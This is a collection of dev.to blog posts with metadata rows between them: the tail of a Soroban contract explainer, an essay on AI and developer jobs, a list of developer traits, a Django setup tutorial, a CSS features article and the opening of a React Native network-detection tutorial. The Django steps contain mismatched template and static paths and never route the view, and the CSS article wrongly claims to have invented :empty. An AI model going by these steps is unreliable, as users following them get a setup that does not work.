- Imports token functionality from `soroban_token_spec.wasm` using `soroban_sdk::contractimport`
- Defines a `DataKey` enum with an `Offer` variant to represent the single offer storage key
- Defines an `Offer` struct to hold the details of the offer: seller address, sell/buy token addresses, and sell/buy prices
- Defines a `SingleOffer` unit
It implements a `contractimpl` for `SingleOffer` with the following functions:
> `create` - Creates an initial offer. Requires seller authentication, checks that non-zero prices are used, and stores the offer.
> `trade` - Allows trading at the current offer price. Requires buyer authentication, loads the offer, creates token clients, computes the amount to trade, checks that the amount is acceptable, and transfers tokens.
> `withdraw` - Allows the seller to withdraw tokens from the contract. Requires authentication and transfers tokens.
> `updt_price` - Allows the seller to update prices. Requires authentication, checks that non-zero prices are used, loads the offer, updates the prices, and stores the updated offer.
> `get_offer` - Simply loads and returns the current offer.
- Defines `load_offer` function, that loads the single offer from storage using the `DataKey::Offer` key, and unwraps the Result to panic if the offer is not found. It's called from various functions in the contract to load the current offer details.
- Defines `wrote_offer funtion, It stores the given offer in storage under the `DataKey::Offer` key. It's called from the `create` function to initialize the offer, and the `updt_price` function to update the offer.
##Contract Usage
Here's the usage for the `SingleOffer` contract:
1. The seller calls `create` function to initialize the offer with the token pair and initial prices.
2. The seller transfers sell tokens to the contract to fund the offer using `sell_token` function.
3. Buyers call `trade` to buy sell tokens at the current price. The contract will handle transfers buy/sell tokens between the buyer, contract, and seller.
4. The seller can call `updt_price` to update the offer price.
5. The seller calls `withdraw` funtion to withdraw any remaining sell tokens from the contract.
##Conclusion
Overall, the contract shows capability of Soroban contract to allows the seller to create a single token offer, fund it with sell tokens, update the price, and withdraw remaining tokens, while allowing buyers to trade at the current price. Stay tuned for more post in this "Soroban Contracts 101" Series where we will dive deeper into Soroban Contracts and their functionalities.
| yuzurush |
1,411,337 | I’m a software engineer, what does AI mean for me? | The ticking clock Seven years ago, a co-worker and I were walking to lunch in our small... | 0 | 2023-03-22T19:41:15 | https://dev.to/justinschroeder/im-a-software-engineer-what-does-ai-mean-for-me-1e8j | chatgpt, ai, productivity, career | ## The ticking clock
Seven years ago, a co-worker and I were walking to lunch in our small town of Charlottesville, Virginia. To our surprise, we realized we had passed _three_ digital agencies on our short stroll. Web developers are everywhere — and for good reason. It’s nearly impossible to run a business without a digital presence. The world needs our “product.”
Yet at that moment, I remember saying:
> Too many people are getting paid too much for this industry to go on without disruption. The target on our backs is too big.
That moment, seven years ago, was the beginning of a career change for me. I realized that the clock was ticking on my toolset being “special.” It wasn’t long after that walk with my co-worker that I left the agency I was working for to take a stab at building a business of my own — before the clock ran out on my abilities being “special.”
As software engineers, we have long enjoyed being a necessity in nearly every start-up. Famously, many start-up incubators require one of the founders to be an engineer, and often the first big hiring wave of a growing business is... engineers. Meanwhile, developer salaries have ballooned — I know one self-taught engineer making $600k/year. Again, the target on our backs is _massive_.
## The match
I thought the impending engineering disruption would come from increasingly powerful SaaS products like Squarespace, WebFlow, or no-code. The day GitHub co-pilot was released, I realized I was wrong. The disruption would come from AI. I told our team that first day:
> I may or may not use co-pilot (of course, I ended up using it), but I really believe this is the beginning of the end of our industry.
My time horizon for that statement was denominated in decades. Perhaps, I thought, in 20 years, the world will require 50% fewer engineers.
I was off by a factor of ten.
## The legacy of replacement

Jobs have been changing for centuries. Some jobs become obsolete while new jobs are created in their wake. The industrial revolution eliminated scores of jobs but also created many new ones. Factory shift work was born. Suddenly it became essential to get to work on time — so a new job was born, the window “knocker-upper.” This person would simply knock on your window to wake you up in the morning. Eventually, this new role was itself replaced by the alarm clock.
Before phototypesetting, printing press plates were manually assembled by a “compositor” — a job made entirely obsolete by newer technology (it lives on in our digital jargon). More recently, digital photography caused massive disruption to the film industry. It wasn’t that long ago that every Walmart had a darkroom technician, Kodak was a household name, and polaroids were convenient — not hipster.
The dawn of digital photography was a warning shot across the bow of the film industry. Adapt or die. Most died. I imagine the scuttlebutt in their hallways sounded a lot like developer Twitter does today, “digital cameras just can’t __x__” — a desperate and combative search for relevance in the face of unrelenting market efficiency.
## New roles and old ones?

It’s not all doom and gloom, though. Prompt engineer, data researcher, cybernetically enhanced humanoid software engineer, farmer — the jobs we have in the future may not yet exist, or they may be a resurgence of jobs as old as time. One thing is certain, though, new jobs _will_ emerge — the challenge of knowing exactly where is an [n-body](https://en.wikipedia.org/wiki/N-body_problem) problem — no one can accurately predict it.
In 2007 when the iPhone was announced, it was impossible to predict that it would directly lead to thousands of people picking up food from local restaurants for delivery, letting strangers sleep in our homes, or causing scores of people to run around New York City trying to catch Pokémon.
Although AI doomsayers love to tell us how “this time it’s different,” — don’t believe the lie; nothing is new under the sun; it’s always just a different shade of the same thing. **Instead, we should be aware that these changes will come, so don’t let emerging opportunities escape your grasp. If you cover your ears and close your eyes progress will march on despite your resistance.**
## How far is that horizon?

If you are an engineer reading this, your emotions will fall into one of three categories:
- **Optimism.** You’re excited. You see opportunity around every corner, and this is a big corner.
- **Denial.** You’ve seen ChatGPT make mistakes. It doesn’t even know basic math. Your job is safe. All this hype is just that, hype.
- **Concern.** You’re not sure what the future holds, but you know things are going to change. You’re grappling to understand how you fit into the unfolding future.
The truth is we don’t know how far we are from a future that causes a dramatic shift in engineering labor. ChatGPT cannot entirely replace a human engineer on any single metric today. It does not — at present — possess the capability for unique critical thinking. However, five years ago, if asked, most engineers would have said their jobs would be one of the last to rest on the chopping block. Now we can all (even the deniers) _envision_ a future where AI can do our jobs.
How far are we from that vision becoming a reality? In 2000 BCE Wan Hu imagined going to the moon — he could do it by the end of the day, probably. He strapped 47 rockets to his chair in what was history’s first attempted moon landing. Humanity’s imagination and capability were separated by 4,000 years.
It is possible that ChatGPT has merely given us the ability to _imagine_ a world where AIs replace engineers — but the capability to _actually_ do so might still be a long-distant future.
Alternatively, we might be window knocker-uppers in the age of alarm clocks.
## What will I do?

From a career standpoint — my work still matters. I’m still “better” than the AI — and you are too — but I know I’m going to be keeping an eye out for where things are heading more than I have ever done before. What new tools can be created with this technology? What opportunities are opening up that didn’t previously exist? What new jobs will be created? What am I truly great at? How can I bring unique value into the world? What is my plan if the coming disruption leaves me out?
How about you? Do you think of yourself as someone who codes because you’ve learned the syntactic shibboleths to get a computer to do what you want? Or are you someone who codes to solve problems? Engineering is solving problems. As AI assistance becomes AI creation, our tools to solve problems will change — if you’re a syntax machine **you will be replaced by a more efficient syntax machine**. If you are a problem solver, you’ll be a more efficient problem solver — at least for now.
On a personal level — I’m more inspired than ever to be great at the things AI can never do — be a nurturing father to my kids, a great husband to my wife, and an active member in my community. Life is far too rich and precious to be defined only by the _type_ of work we do. Live your life, love your people, and for heaven’s sake — eat some good food. After all, the AI can’t do that either — yet.
| justinschroeder |
1,411,558 | 10 Traits That Separate the Best Devs From the Crowd | We work hard to improve our tech and soft skills. But our character traits, our mindset - we take... | 0 | 2023-03-24T16:00:00 | https://blog.trueseniordev.com/10-traits-of-outstanding-dev/ | career, programming, productivity, beginners | > * We work hard to improve our tech and soft skills. But our character traits, our mindset - we take it for granted. An innate, fixed part of who we are. And thus we let it run on autopilot.
> * This way of thinking is harmful. Not only is your mindset critical for a successful software development career (maybe even more than your skills) but it's also under your control.
> * True senior devs acknowledge that character traits are malleable, are self-aware of their mindset, and deliberately work on it. This is the superpower that makes them stand out from the crowd and accelerates their career.
> * In this post, I'll discuss the 10 most critical traits of a successful developer, why are they important, and share a few tips on how you can shape them.
## 3 things you need to succeed as a software developer
Professional software development is a complex discipline, which requires a diverse set of abilities to succeed. We can group them into three main categories:
### Technical skills
This is the most obvious group. To be a successful developer, you need to be good at your trade: programming languages and frameworks, clean code principles, architecture, testing, debugging, and so on. You also need to be skillful with your tools: version control, command line, IDE.
However, technical skills alone won't get you far in a professional, team-based setup. That's why you need also soft skills.
### Soft skills
To be able to work on big, commercial projects you need a solid set of soft skills: teamwork, communication, project management and planning, remote work, self-organization, learning, personal productivity, and similar.
Many of us find these skills less fun than the technical ones, and thus we often neglect them - so they can already separate solid, professional developers from the crowd. But at least we acknowledge them.
There's also a third category, though, which is equally important but flies under the radar of almost all, even the otherwise good, developers.
### Mindset
Mindset is kinda similar to soft skills, but the "skills" it's comprised of are more fundamental, core traits: curiosity, patience, empathy, grit, adaptability, and so on.
On some level, we know these traits are important for a successful software development career. But because they seem an innate, fixed part of our personality, we do not attempt to deliberately learn them in the same way we learn project management or personal productivity techniques.
This makes us blind to a huge and important part of our skillset and can badly hurt our progression.
## Why being blind to your mindset can jeopardize your career
Software development is a complex, sometimes frustrating, and insanely fast-moving field. Learning, growing, and staying relevant as a developer (and not burning out in the process) requires a specific mix of character traits.
At the same time, it's a 100% team game. Lone-wolf hackers have no place in professional software development, no matter how good they are technically. And functioning well in a team requires another, seemingly opposite, set of traits.
Mindset is something different than skills. Understanding Agile development principles is not the same as being adaptable and open to frequent change. And knowing the debugging techniques is not the same as having the curiosity and persistence to actually enjoy chasing the problem for several hours without getting burned out or discouraged. But while these traits may seem fixed, innate to our personality, they are equally learnable as skills.
Without understanding what traits are critical for a programmer and deliberately honing them over time, you'll never reach your full potential. True senior developers know this, are self-aware of their mindset, and continuously work on improving it. This is the differentiator, the superpower that separates the best developers from the crowd.
Ok, but which traits are the most important? Let's dive a bit deeper into the details.
## 10 traits of a true senior developer
### 1. Curiosity
If I had to summarize in one sentence what software development is about, I'd say it's about learning. You need to stay up-to-date with constantly evolving technologies and software development processes. You need to learn the deep details of complex business domains (several ones throughout your career). Analyzing and clarifying requirements is learning. Research is learning. Performance optimization and debugging - in other words, poking deeply into the inner workings of code - is a kind of learning as well.
Software development is also about working with people (and *for* people). You'll be working on cross-functional teams, with a diverse set of people from different specializations and backgrounds (nowadays, in the age of remote, most probably from multiple countries and cultures). You'll have to understand "business". You'll have to understand and solve user pain points and problems.
Without a healthy dose of curiosity, you'll not only be less effective at all those things but you'll also burn out pretty quickly.
### 2. Affinity for problem-solving
Software development is a giant puzzle - an infinite stream of problems to solve. The reason you are hired as a developer is to solve your company's and customers' problems. To do this, you need to solve organizational problems (how to function as a team, how to organize your work, what processes to use) and technical problems (logic, architecture, performance, and so on). These problems consist of even smaller, nested problems, down to atomic problems like how to design and name a particular function or unit test.
If you don't enjoy solving such puzzles, if you don't have a knack for breaking down and untangling problems, your software development career will be a struggle.
### 3. Patience
Becoming a true senior developer requires years of deliberate practice. You'll also experience a lot of setbacks along the way. Developing your career is rewarding but also a slow and sometimes painful process. To achieve excellence and get to the top, you must be ready for lifelong dedication. And this requires a lot of patience.
Patience is also critical for a lot of things adjacent to our job: handling technical support, working with not-very-tech-savvy users, coping with organizational bureaucracy. Plus, it's a great problem-solving aid. And you won't sustain working in such a fast-moving, constantly changing industry as tech without patience.
### 4. Grit (in just the right amount)
Software development requires a lot of persistence. Hunting bugs. Deciphering poorly documented APIs and libraries. Untangling legacy code. Tracking down performance bottlenecks. Even simply sustaining a deep focus for extended periods of time.
You'll struggle, and fail, and get stuck, and get frustrated a lot - no matter how senior you are. And you'll need a lot of grit to plow through and not get burned out.
But you also need to understand what's the right amount of grit. What's the sweet spot between unproductively banging your head against the wall for hours and days vs constantly disrupting your team by requesting assistance immediately when you hit even the smallest bump in the road.
### 5. Emotional intelligence
Software development revolves around people and teams. You'll work very closely with your colleagues at an individual level: pair program, debug together, review their code. You'll also work with them in a team setup: brainstorm, plan, and make decisions as a group. And this collaboration is messy: your work will overlap or conflict, you'll have different opinions. You'll negotiate your roadmap with management. Finally, to build a great product, you'll have to put yourself in your users' shoes.
On top of that, all these people come from diverse backgrounds, both technical and non-technical. They are passionate. They have strong opinions. They may sometimes have difficult characters. And your success as a developer depends on how well you can build rapport with them. Without high emotional intelligence, it'll simply be impossible.
### 6. Ability to keep your ego in check
Software development (and working in a team in general) is a balancing act. On one hand, you're hired for your expertise. You're expected to have strong opinions and to guide less tech-savvy or more junior people. On the other hand, you'll work with equally experienced and opinionated teammates, who will challenge your point of view and with whom you'll have to make group decisions.
Your ego will often get hurt in the process. You must be able to keep it in check - but without getting withdrawn and disengaged.
You must be opinionated but not zealot. Have a strong point of view but hold it weakly, be open to getting convinced otherwise. You must be ready to defend your opinion but also know when to let go, to not be a condescending, brilliant jerk. You need to respect the team, business, and customers. Be able to disagree but commit. And gracefully take constructive (and even purely negative) feedback. Otherwise, you won't be able to effectively work in a team.
### 7. Adaptability
Everything in software development is moving so fast. Technologies are constantly changing. New methodologies get popular. Companies pivot.
Throughout your career, you'll be also changing projects, teams, companies, and business domains. Even a single project is a constant act of inspecting and adapting (especially in agile approaches). And your team will constantly self-reorganize, too.
Most people are allergic to change. Change is hard. It's uncomfortable. It's stressful. Being adaptable and open to change will instantly set you apart. It will not only let you climb to the top of the seniority ladder but it will also let you *stay there* for a long time.
### 8. Reliability
I'm repeating it ad nauseam, but software development is a team game. Your colleagues, manager, and company - they all count on you to do your part. Nobody ever will consider you a true senior developer - no matter your tech expertise - if they can't rely on you to take care of your work and deliver on your promises without having to be micromanaged.
It doesn't mean you can never make any mistakes. Failures happen. And the best companies see them as valuable learning opportunities. But to enable this, you need to be able to pick up a dropped ball, gracefully recover, and be trusted to learn from your failure and not repeat it in the future.
### 9. Pragmatism
Professional software development is an art of tradeoffs. You constantly need to compromise between development speed and quality. Balance new and promising with proven and stable. Walk a thin line between under- and over-engineering.
To succeed in professional software development you need to be very pragmatic. You need to understand that nothing is black and white, that no principle or pattern holds true in every situation. You must have great intuition for making tradeoffs between different approaches, technologies, and solutions; feel comfortable cutting corners but have a good sense of how much.
### 10. Positive outlook
Your life as a programmer is not all sunshine and rainbows. You'll meet annoying customers. Face tight deadlines. Your project may get canceled. You may disagree with your team or management but still have to commit and execute. You'll also work with ugly code. (Yes, every codebase has good and bad parts, even at the top companies like Google.)
You'll get tired, frustrated, upset.
If you let negativity take over, if you start criticizing and complaining, you'll not only demotivate yourself but you'll also kill the morale of your team - which won't take your career very far.
You need to be biased toward the positive. Be optimistic and cheerful. Always look for a silver lining. Be the person who rallies their team, kills the bad mood, and restores morale. It'll not only get you noticed and promoted, it'll also make your career more pleasant and sustainable.
## BONUS: A few tips on how to deliberately shape your mindset
Skills, obviously, can be trained - both soft and technical ones. You can get better at debugging as well as at communication. But what about such seemingly innate traits like curiosity or a positive outlook? Can you really train yourself to be more optimistic or curious?
Yes, you can! This is a vast topic, worth several books ("Mindset" by Carol S. Dweck is a great starting point). But let me quickly share a couple of tips:
* Acknowledge that your mindset is not fixed, that your traits are malleable.
* Build self-awareness. Observe how you react in different situations. Try to understand what makes you feel in a particular way (curious vs bored, positive vs grumpy, eager vs defensive).
* Retrospect on your behavior from a perspective of a day or two. Was your opinion really pragmatic or was it your ego talking? How could you have acted differently?
* Prepare in advance. Pre-plan up-front how you'll behave next time in a similar situation and identify the right trigger that will remind you about your plan when the time comes.
* Expose yourself to situations that will let you exercise and strengthen desired traits. Actively look for such opportunities.
* Focus on a single trait for some time. It will make it easier to find opportunities to exercise it and to increase your self-awareness of this trait.
* Reframe. Be conscious and deliberate about how you talk to yourself. The idea isn't stupid, it's surprising. That shiver isn't anxiety, it's excitement. The problem isn't frustrating, it's interesting.
* Enlist help. Don't shy from asking your colleague or manager for feedback - or even to become your "accountability partner" who will catch and point out your unwanted behavior.
I also encourage you to learn a bit about cognitive biases and habit forming. This is a well-developed discipline, with a huge body of knowledge, and pretty fun to explore.
## Bottom line
If you want to be a true senior developer, you have to be a complete one. You must have the right mix of tech skills, soft skills, and character traits and you can't ignore any part of this trio.
Character traits are the most tricky part. Most developers neglect them because they are either not self-aware of them, don't know which ones are important, or don't believe they are malleable.
But if you can overcome this flawed way of thinking - if you can change your mindset - you can turn it into a superpower that will elevate your career and make you truly stand out.
---
😎 Are you a **_TRUE_ senior dev**? 😎 Are you on the right track to becoming one? ➡️ **[CHECK MY ULTIMATE GUIDE TO FIND OUT](https://trueseniordev.com/5L9Z).** ⬅️ | zawistowski |
1,411,592 | Optimised Django App Setup in Windows VSCode 🚀🐍🛠️ | Setting up a new Django project is a multi-step process that involves installing various tools and... | 22,336 | 2023-03-28T17:09:38 | https://dev.to/siwhelan/optimized-django-app-setup-in-windows-vscode-lg2 | python, django, docker, beginners | Setting up a new Django project is a multi-step process that involves installing various tools and packages, creating directories, and configuring settings. This process can take up valuable time and effort that could be better spent on developing your app's functionality.
To help streamline the process and make it easier to start my own Django projects, I created a step-by-step guide that combines essential tools and best practices like VSCode, venv, and .gitignore. This step-by-step is something I created for myself to make setting up Django projects easier and faster. As I found it helpful, I thought it might be beneficial to share it with other developers learning Django.
In this tutorial, I'll guide you through my process of setting up a new Django web app quickly and efficiently. We'll cover everything from installing Python and Django to creating a virtual environment and generating a requirements.txt file. By the end of this tutorial, you'll have a fully functioning Django app up and running! 🚀🐍🛠️
We're going to build a basic [Django](https://www.djangoproject.com/) app that interacts with the Internet Archive's [Wayback Machine](https://archive.org/web/) API. While intentionally simple, this app demonstrates the use of various technologies and best practices, making it a perfect example for our easy to follow Django app template.
Our app will allow users to input a URL and an optional timestamp, and then check if the Wayback Machine has a snapshot of that URL available. If a snapshot exists, the app will display the archived content; if not, it will inform the user that the URL isn't available in the Wayback Machine.
Here's a quick overview of the app's functionality:
1) We define a `check_wayback_availability()` function that takes a URL and an optional timestamp as arguments. It sends a GET request to the Wayback Machine API and returns the JSON data.
2) The `index` view function handles both GET and POST requests. If it receives a POST request, it retrieves the URL and timestamp from the request, checks the Wayback Machine for a snapshot, and renders the appropriate template based on the availability of the URL.
Although the app itself is fairly simple, it showcases how our Django app template can be used to set up a project quickly and efficiently. By following this tutorial, you'll learn how to implement this app while building a time-saving optimised template that you can use in future projects.
First off, let's build a basic Django environment -
Step 1: Install Python 3 and Django
Make sure you have Python 3 and Django installed on your system. You can download Python from the [official website](https://www.python.org/downloads/) and install Django using pip:
pip install django
Step 2: Install VSCode
If you haven't already, download and install [Visual Studio Code](https://code.visualstudio.com/)
Step 3: Open VSCode and launch the terminal
Open VSCode and press Ctrl+~ or click on 'Terminal' in the top menu, then select 'New Terminal' to open the integrated terminal.
Step 4: Create a new directory for your project
Create a new directory for your project using the following commands, I've called mine 'wayback' but you can call yours whatever you like!
mkdir wayback
cd wayback
Step 5: Create a virtual environment
python -m venv venv
This will create a virtual environment named "venv" in your project directory.
Step 6: Activate the virtual environment
.\venv\Scripts\Activate
Your terminal should now show the virtual environment's name in the prompt.
Step 7: Install Django in the virtual environment
pip install django
Step 8: Start a new Django project
django-admin startproject wayback_project .
This will create a new Django project in your current directory.
Step 9: Create a new Django app
python manage.py startapp wayback_app
Step 10: Run the development server
Run the development server using the following command:
python manage.py runserver
You should see a message saying that the development server is running at http://127.0.0.1:8000/.
Open a browser and visit http://127.0.0.1:8000/ to see your new Django web app running. It should look something like this -

You now have a Django web app running in a virtual environment using Python 3 in the VSCode terminal on Windows!
Ok, we've successfully set up a basic Django environment and created a new project and app. Now, it's time to set up `urls.py` in your Django project so that your app's URLs can be included in your project's URLs. In a Django project, you can create multiple apps, each with its own URLs. However, to make these app URLs accessible within the project, you need to include them in the project's main URLs. This enables users to navigate through the app's URLs within the project's URL structure.
In your Django project, open the your_project_name/urls.py file, where your_project_name is the name of your Django project, for this example, mine is 'wayback_project'. Import the include function by modifying the existing import statement at the top of the file:
```python
from django.urls import path, include
```
In the urlpatterns list, add a new entry that includes the URLs from your app:
```python
path('wayback_app/', include('wayback_app.urls')),
```
Now, you need to create a urls.py file inside your app's directory. In the VSCode terminal, run:
type nul > wayback_app\urls.py
This command will create an empty urls.py file inside your app's directory.
Open the newly created urls.py file in your app's directory, and add the following content:
```python
from django.urls import path
from . import views
urlpatterns = [
# Add your app's URL patterns here
]
```
This file is where you will define the URL patterns specific to your app.
Now your Django project is set up to include URLs from your app. As you create new views in your app, you can add corresponding URL patterns to the urls.py file in your app's directory. Make sure to update the urlpatterns list in the wayback_app/urls.py file with the new paths.
After you have installed all the necessary packages for your Django project, you can use the pip freeze command to generate a requirements.txt file containing a list of all the installed packages and their versions.
To generate the requirements.txt file, navigate to your project directory in the VSCode terminal and run the following command:
```
pip freeze > requirements.txt
```
This will create a requirements.txt file in your project directory containing a list of all the installed packages and their versions.
You can then use this file to install the same packages and their versions in a different environment by running the following command:
pip install -r requirements.txt
This will install all the packages listed in the requirements.txt file in the current environment.
A requirements.txt file ensures all required packages are installed, making it easier to reproduce the same environment in different places. This is crucial for Docker, which requires consistent environments to prevent issues and inconsistencies when running an app in a containerised environment.
To add a `.gitignore` file to your Django project, follow these steps:
In the VSCode terminal, navigate to the root of your project directory if you are not already there.
Create a new .gitignore file:
type nul > .gitignore
This command will create an empty .gitignore file in your project directory.
Open the .gitignore file in VSCode by clicking on it in the file explorer or using the File > Open menu.
Add the following content to the .gitignore file to exclude common files and directories that should not be tracked by Git:
# Python artifacts
__pycache__/
*.pyc
*.pyo
*.pyd
.Python
env/
venv/
ENV/
# Django artifacts
*.log
*.pot
*.pyc
db.sqlite3
media/
# VSCode artifacts
.vscode/
# Git artifacts
.git/
Save the file by pressing Ctrl+S or clicking File > Save.
You now have a .gitignore file in your Django project that excludes common files and directories from being tracked by Git. You can customize the file to include or exclude any additional files or directories specific to your project.
Now that you have a basic Django app up and running, let's add some basic HTML and CSS to our web app. This will help to make our app more visually appealing and user-friendly.
Create two folders in your wayback_app folder named 'static' and 'templates'.
Inside the 'static' folder, create a new file named 'styles.css'. Open it and paste the following code:
```css
body {
font-family: Arial, sans-serif;
}
.welcome {
color: darkblue;
}
```
Inside the 'templates' folder, create a new file named 'index.html'. Add the following code:
```html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Wayback App</title>
<link rel="stylesheet" href="{% static 'wayback_app/css/styles.css' %}">
</head>
<body>
<h1 class="welcome">Welcome to the Wayback App!</h1>
</body>
</html>
```
Open the settings.py file located in the wayback_project folder, and modify the TEMPLATES and STATIC_URL settings as follows:
```python
TEMPLATES = [
{
...
'APP_DIRS': True,
...
},
]
STATIC_URL = '/static/'
```
You'll also need to add your app to the INSTALLED_APPS setting - it should look something like this:
```python
INSTALLED_APPS = [
"wayback_app",
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
]
```
Almost there! Now open the views.py file in wayback_app and add the following lines:
```python
from django.shortcuts import render
def home(request):
return render(request, 'wayback_app/index.html')
```
This code is like a recipe for creating a webpage. It has a function called `home()` that takes a request (like a message) and uses it to put together an HTML page. It uses a Django function called render to take the `index.html` file in the wayback_app folder and put it together into a page for the user to see.
So when someone goes to a certain URL on your website, this code helps create the page that they see.
Finally, run the development server again using the following command:
```
python manage.py runserver
```
Now, when you visit http://localhost:8000/wayback_app/, you should see the "Welcome to the Wayback App!" message, and if your static file is correctly set up, it should be in blue!

Ok, that's enough for Part 1 of this series! In the next part we'll build our app, implement some more complex HTML and CSS to make the app more visually pleasing, and package it in a Docker container with all it's dependencies, making it easy to deploy and run on any machine.
Hope you've found this helpful so far, and if you have any questions please ask!
Thanks for reading! 👋
| siwhelan |
1,411,622 | Revolutionize Your CSS Skills with These 8 Cutting-Edge CSS Features | Introduction: Having all the CSS concepts and remembering them is quite difficult, so here... | 0 | 2023-03-22T21:09:55 | https://dev.to/abdulrahmanismael/revolutionize-your-css-skills-with-these-8-cutting-edge-css-features-1gil | webdev, css, codenewbie, frontend | ## Introduction:
Having all the CSS concepts and remembering them is quite difficult, so here I will go over the most important CSS concepts that will take your CSS knowledge to the next level…
---
## Now, get your pen and paper ready because we have some exciting new CSS features to unveil:
### **1- “:empty” Pseudo-Class:**
- A new pseudo-class I came up with is “:empty”, which styles any element that contains no child nodes (child elements, text, etc.) so that you can fill up the element later with JavaScript which will remove those styles as the element is no longer empty.
- This is useful in a variety of situations, including the example we mentioned above.
```
p:empty{
display: none;
}
```
- the element will not be displayed only if it is empty, otherwise, it will show up on the screen with its children.
### **2- “:target” Pseudo-Class:**
- Sometimes you want to make some links that move to someplace on the same page, and at that moment you need to make some “focus styling” on the place you are moving to, that’s why “:target” pseudo-class has existed…
- “:target” pseudo-class is used to style any element in the page that is targeted from some link on the same page
```
section:target{
outline: 2px solid #ff0000;
}
```
### **3- “:only-child” | “:only-of-type” Pseudo-Classes:**
- “:only-child” pseudo-class is used to style an element that is the only child in its parent element
- “:only-of-type” pseudo-class is used to style an element that is the only element of its type in its parent element.
```
HTML:
<section>
<p class='paragraph'> Hello World </p>
</section>
CSS:
.paragraph:only-child {
color: #666;
}
.paragraph:only-of-type {
border: 1px solid #ff0000;
}
```
### **4- “:has()” Pseudo-Class:**
- Absolutely, It is one of the most powerful features that really changed CSS, you should understand how powerful this pseudo-class is.
- It is used to style any element but just if it has some child element in it.
- for instance, let’s say you have two “section” elements and one of them has “h1” element inside it. If you want to give the element that has the heading element inside it some special style, that can be done by giving the element some specific class or id or using JavaScript.
- but now using this new feature, that can be done in a few seconds.
```
HTML:
<section>
<h1> Hello From Section 1 </h1>
</section>
<section>
<p> Hello From Section 2 </p>
</section>
CSS:
section:has(h1) {
border: 1px solid red;
}
```
- Only the first section element that has the “h1” element inside it will have a red border.
### **5- “:is()” Pseudo-Class:**
- This feature will save you a lot of time, It is used to simplify grouping selectors, Its usages:
- grouping element selectors
```
:is(h1,h2,h3,h4,h5,h6) {
margin: 0;
}
```
- grouping pseudo-classes
```
button:is(:hover, :focus) {
border: 1px solid #555;
}
```
### **6- inset property:**
- Save yourself some coding time with this shorthand property, which combines the (top, right, bottom, and left) properties into a single line. It’s a convenient way to streamline your code and make it more efficient.
- And if you’re looking to position an element absolutely and have it fill its parent container, look no further than this property. It’s the perfect solution for achieving a seamless, full-width design.
```
section::after{
position: absolute;
inset: 0;
/* Instead of */
/* top: 0; */
/* bottom: 0; */
/* left: 0; */
/* right: 0; */
}
```
### ** 7- “vmax” unit:**
- This versatile unit has many applications. For instance, if you want to create a pill-shaped element, simply apply a “border-radius” property with a value of “100vmax”. It’s that easy!
```
div{
.
.
border-radius: 100vmax;
}
```
- It can be used to give an element the full width of the viewport, instead of using “100vw” values and falling into (overflow) issues:
```
div {
box-shadow: 0 0 0 100vmax var(—same-bgColor-of-the-element);
clip-path: inset(0 -100vmax);
}
```
### **8- Advanced Selectors:**
- Knowing these advanced selectors is essential for any web developer, as they can help you achieve complex effects without relying on JavaScript.
- In other words, they’re powerful tools that can streamline your workflow and enhance your coding skills.
```
img[alt]{
/* Selecting any (img) element that has (alt) attribute */
}
img[alt="image"]{
/* Selecting any (img) element that has (alt) attribute
with the value "image" */
}
img[alt^="image"]{
/* Selecting any (img) element that has (alt) attribute
with the letters "image…" at the first of the value */
}
a[href$=".com"]{
/* Selecting any (a) element that has (href) attribute with
the letters "….com" at the end of the value */
}
div[class*="box"]{
/* Selecting any (div) element that has (class) attribute with
the letters "box" anywhere in the value */
}
```
---
## Conclusion:
In conclusion, CSS is constantly evolving, with new features and enhancements being added all the time. By keeping up to date with the latest developments and leveraging the power of advanced selectors, shorthand properties, and versatile units, you can take your CSS skills to the next level and create stunning, responsive designs. So, keep experimenting, keep learning, and keep pushing the boundaries of what’s possible with CSS! | abdulrahmanismael |
1,411,744 | Real-time Network Status Detection with React Native | by Champion Uzoma In today's world, mobile apps need to be able to detect the network state of a... | 0 | 2023-03-23T00:41:46 | https://blog.openreplay.com/real-time-network-status-detection-with-react-native/ | reactnative | by [Champion Uzoma](https://blog.openreplay.com/authors/champion-uzoma)
In today's world, mobile apps need to be able to detect the network state of a device and display appropriate UI to the user based on that state. Whether displaying a custom offline message, a loading indicator, or any other type of UI element, the ability to accurately detect and respond to changes in the network state can greatly improve your app's user experience.
In this tutorial, I will be introducing the `NetInfo` module provided by React Native, which makes it easy to retrieve the current network state and listen for changes in that state. Working with this module, I will go over the different network states and how to display the appropriate UI to the user based on the state of their network.
To follow along, basic knowledge of React Native is essential. You should have completed the [React Native Environment setup](https://reactnative.dev/docs/environment-setup), and for testing the applications, you should have an Android and an iOS simulator running on your computer. If you haven't done these yet, you should find instructions for the [Environment setup here](https://reactnative.dev/docs/environment-setup).
## Detecting & Managing Network Connectivity in Android and iOS
Although it's unfortunate that network connectivity issues are common and can cause frustration and prevent us from completing our tasks, some technologies exist that we can use to manage the situation and stop it from hampering our flow. Whether browsing the web, streaming videos, or connecting with others, having a reliable internet connection is crucial.
The [NetInfo module](https://github.com/react-native-netinfo/react-native-netinfo#readme) in React Native is a powerful tool for detecting the network state of a device. With the availability of mobile devices being increasingly used to access the internet, it's important to ensure that your app can handle network connectivity changes gracefully. The NetInfo module is a simple, lightweight module that provides access to network information such as the type of network (Wi-Fi, cellular, etc.), the network connection quality (fast, slow, etc.), and whether the device is connected to the internet or not.
Some key features of the NetInfo module are its cross-platform compatibility and its ability to detect network state changes in real time. This means that the module works on Android and iOS devices, and your app can respond to changes in network state as they occur, ensuring that your app remains functional even if the network state changes while it is running. This is useful in a variety of situations, such as when you need to determine whether a user is connected to a Wi-Fi network or a cellular network; it can be used to detect network failure and display an error message or take other appropriate actions.
<h2>Session Replay for Developers</h2>
<p><em>
Uncover frustrations, understand bugs and fix slowdowns like never before with <strong><a href="https://github.com/openreplay/openreplay" target="_blank">OpenReplay</a></strong> — an open-source session replay suite for developers. It can be <strong>self-hosted</strong> in minutes, giving you complete control over your customer data
</em></p>
<img alt="OpenReplay" width="768" height="400" src="https://blog.openreplay.com/assets/overview_Z17Qdyg.png" class="astro-UXNKDZ4E" loading="lazy" decoding="async">
<em>Happy debugging! <a href="https://openreplay.com" target="_blank">Try using OpenReplay today.</a></em>
## Implementing Network Detection & Management in a React Native Project
